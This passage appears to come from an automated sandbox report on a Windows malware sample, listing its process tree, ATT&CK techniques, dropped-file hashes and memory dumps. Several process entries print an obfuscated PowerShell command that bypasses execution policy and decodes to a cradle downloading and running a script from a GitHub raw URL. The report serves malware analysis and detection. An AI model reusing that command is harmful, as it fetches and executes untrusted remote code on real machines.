PID:3024

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
PID:2944

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
- Suspicious use of WriteProcessMemory
PID:496

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:3008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:420

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES72E4.tmp
MD5
1fdcac54833b011555c43094a1763d21

SHA1
7fb9f16f77494526834a661676df5f9cefc34491

SHA256
f55f5e5849b63b8f96aac934a51b656348a3f988ff7092e516d8cd6b3be2171c

SHA512
df85222ec6c2ed4751f312f4b79e751ab2cffef626c9782cc04833d81cee5dfb1ed4ae127e68ca83fc7d74b7bea3e18131469fac012a65823432ee8114f998cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.dll
MD5
ebcf3dd3fb890e09d5aaf53f5d2cd059

SHA1
c7fd9283e74d7d404db99271b5561fd11e48661b

SHA256
3eb996aaf7f0200b46a2f8dfdcb313bceec55b1f1d36eae356ebc754fee8ce23

SHA512
11c326e4b57f4a4cb618944c47cb5aa89eccb5402bb56e50564ec94a26316678cbfa0f61c7330a79792f6a07d953367fe925590c2b4296d7a3d97c1950fdad1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
dac6b25db50155c0c78d5bf64fb95fa3

SHA1
9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

SHA256
6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

SHA512
679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip
MD5
7cac19b2868c41555db4b71219217f9b

SHA1
d6f77db578db3c5c572c3a944d9072ed00560dcb

SHA256
d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

SHA512
5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\CSCA0829ACF0674A82AF57138E0B8E8.TMP
MD5
6fb54f8c18a72f011cdb689b07b44ddb

SHA1
1b399425401fc3ec157ea86b9c1df1c9ce7463b3

SHA256
67d3963e68d13fbbb0b49e29d25dac000c5766e5824a40cd33c3aa00dd4da47b

SHA512
e89b3aa38d2be25949cb29135e11f7d544a63a1c0bc2816be8501bec62d1524531570b9169bdb1d625691a75b195e797237b76b56f7170001cf18f091c86aed6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.0.cs
MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\exvorycj\exvorycj.cmdline
MD5
7c4b1de28998359d8fcf90315baa0822

SHA1
13776de0b9e5ef30225aeb3c43f27de4c3f649b2

SHA256
fa27bf08fbb07555661aa1c8f58a1efa94d3aa66d4c057dba12963d2f9cfb5f0

SHA512
8a226984b6f77a1293850742124007f89dcd652fcdc78dc9a567cbd1df24d916b59a81fd29224a9a51e678cd6ae87ac43df935480cb1decbee1c22df691294f8

Download Submit
\Windows\Branding\mediasrv.png
MD5
eeb448ea2709c57b9ea2e223d0c79396

SHA1
38331dd027386151ee37a29a7820570a76427b02

SHA256
c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

SHA512
c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

Download Submit
\Windows\Branding\mediasvc.png
MD5
bb873bd05a47f502ee4ed3c4ea749a4f

SHA1
e55a6bf49a4833fb9e9b123df39dac9bf507f75a

SHA256
a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

SHA512
ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

Download Submit
memory/188-41-0x0000000000000000-mapping.dmp

Download
memory/196-16-0x0000000000000000-mapping.dmp

Download
memory/212-48-0x0000000000000000-mapping.dmp

Download
memory/212-15-0x0000000000000000-mapping.dmp

Download
memory/420-47-0x0000000000000000-mapping.dmp

Download
memory/420-49-0x00007FFC33E60000-0x00007FFC3484C000-memory.dmp

Filesize
9.9MB

Download
memory/508-32-0x0000000000000000-mapping.dmp

Download
memory/580-1-0x00000000018C0000-0x00000000018C1000-memory.dmp

Filesize
4KB

Download
memory/732-17-0x0000000000000000-mapping.dmp

Download
memory/912-35-0x0000000000000000-mapping.dmp

Download
memory/1000-25-0x0000000000000000-mapping.dmp

Download
memory/1020-14-0x0000021619530000-0x0000021619531000-memory.dmp

Filesize
4KB

Download
memory/1020-5-0x00000216342D0000-0x00000216342D1000-memory.dmp

Filesize
4KB

Download
memory/1020-4-0x00000216315D0000-0x00000216315D1000-memory.dmp

Filesize
4KB

Download
memory/1020-3-0x00007FFC33E60000-0x00007FFC3484C000-memory.dmp

Filesize
9.9MB

Download
memory/1020-2-0x0000000000000000-mapping.dmp

Download
memory/1056-26-0x0000000000000000-mapping.dmp

Download
memory/1336-37-0x0000000000000000-mapping.dmp

Download
memory/1492-45-0x0000000000000000-mapping.dmp

Download
memory/1500-31-0x0000000000000000-mapping.dmp

Download
memory/1600-30-0x0000000000000000-mapping.dmp

Download
memory/1704-38-0x0000000000000000-mapping.dmp

Download
memory/1724-23-0x0000000000000000-mapping.dmp

Download
memory/2060-27-0x0000000000000000-mapping.dmp

Download
memory/2212-39-0x0000000000000000-mapping.dmp

Download
memory/2308-24-0x0000000000000000-mapping.dmp

Download
memory/2400-10-0x0000000000000000-mapping.dmp

Download
memory/2400-36-0x0000000000000000-mapping.dmp

Download
memory/2400-20-0x0000000000000000-mapping.dmp

Download
memory/2944-43-0x0000000000000000-mapping.dmp

Download
memory/2944-22-0x0000000000000000-mapping.dmp

Download
memory/3008-18-0x0000000000000000-mapping.dmp

Download
memory/3008-46-0x0000000000000000-mapping.dmp

Download
memory/3024-42-0x0000000000000000-mapping.dmp

Download
memory/3048-40-0x0000000000000000-mapping.dmp

Download
memory/3500-33-0x0000000000000000-mapping.dmp

Download
memory/3584-7-0x0000000000000000-mapping.dmp

Download
memory/3680-21-0x0000000000000000-mapping.dmp

Download
memory/3792-34-0x0000000000000000-mapping.dmp

Download
memory/4012-19-0x0000000000000000-mapping.dmp

Download